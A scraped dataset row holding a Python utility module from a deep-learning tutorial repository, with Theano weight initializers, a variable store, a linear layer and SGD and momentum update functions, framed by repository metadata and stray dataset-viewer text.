] | lyxiong@mobvoi.com |
1b31f7c605bdd9ce3eea12c14e8665f08b7c8b6f | 50466b1d85816f34b83afe3714c27ee25f9276ad | /Tensorflow new1/seq2seq/1/ipython-notebooks-master/utils/__init__.py | a90a5d4e44f65bd719c35f0ac8e728ed648c7db2 | [] | no_license | codingMJ/selected-tutorials-Deep-Learning | b8416f911d55b3802f5b5f74bdfd810507953010 | 61b7d40f6e0b9ff9ecd1f41c6b69cb2e71646fad | refs/heads/master | 2021-09-07T17:31:47.597249 | 2018-02-26T22:29:47 | 2018-02-26T22:29:47 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,700 | py |
from collections import OrderedDict
import logging
import numpy as np
import theano
from theano import tensor as T
floatX = theano.config.floatX
def init_uniform(range=0.1, dtype=floatX):
    """Return an initializer sampling uniformly from [-range, range]."""
    def _sample(shape):
        return np.random.uniform(-range, range, size=shape).astype(dtype)
    return _sample
def init_normal(stdev=0.1, dtype=floatX):
    """Return an initializer sampling from N(0, stdev)."""
    def _sample(shape):
        return np.random.normal(0.0, stdev, shape).astype(dtype)
    return _sample
def init_zeros(dtype=floatX):
    """Return an initializer producing all-zero arrays."""
    def _sample(shape):
        return np.zeros(shape, dtype=dtype)
    return _sample
class VariableStore(object):
    """Registry of named theano shared variables, created lazily by add_param."""

    def __init__(self, prefix="vs", default_initializer=init_uniform()):
        self.prefix = prefix
        self.default_initializer = default_initializer
        self.vars = {}

    @classmethod
    def snapshot(cls, other, name=None):
        """
        Create a new `VariableStore` by taking a snapshot of another `VariableStore`.
        All variables in the other store will be cloned and put into a new instance.
        """
        store = cls(name or "%s_snapshot" % other.prefix)
        for param_name, param_var in other.vars.iteritems():
            clone = theano.shared(param_var.get_value(), borrow=False)
            store.vars[param_name] = clone
        return store

    def add_param(self, name, shape, initializer=None):
        """Return the shared variable ``name``, creating it on first request."""
        if initializer is None:
            initializer = self.default_initializer
        if name in self.vars:
            return self.vars[name]
        full_name = "%s/%s" % (self.prefix, name)
        logging.debug("Created variable %s", full_name)
        self.vars[name] = theano.shared(initializer(shape), name=full_name)
        return self.vars[name]
def Linear(inp, inp_dim, outp_dim, vs, name="linear", bias=True):
    """Affine map inp.dot(W), plus a zero-initialised bias when ``bias``."""
    weights = vs.add_param("%s/w" % name, (inp_dim, outp_dim))
    out = inp.dot(weights)
    if not bias:
        return out
    offsets = vs.add_param("%s/b" % name, (outp_dim,), initializer=init_zeros())
    return out + offsets
def SGD(cost, params, lr=0.01):
    """Vanilla gradient-descent updates: p <- p - lr * d(cost)/dp."""
    updates = OrderedDict()
    for param, grad in zip(params, T.grad(cost, params)):
        updates[param] = param - lr * grad
    return updates
def momentum(cost, params, lr=0.01, momentum=0.9):
    """Classical momentum SGD updates.

    For each parameter p with gradient g, keeps a shared velocity v and
    applies: v <- momentum * v + lr * g ; p <- p - v.
    """
    updates = OrderedDict()
    for param, grad in zip(params, T.grad(cost, params)):
        value = param.get_value(borrow=True)
        # Per-parameter shared velocity accumulator, initialised to zero.
        velocity = theano.shared(np.zeros(value.shape, dtype=value.dtype))
        step = momentum * velocity + lr * grad
        updates[velocity] = step
        updates[param] = param - step
    return updates
"altay.amanbay@ip-192-168-5-166.ec2.internal"
] | altay.amanbay@ip-192-168-5-166.ec2.internal |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.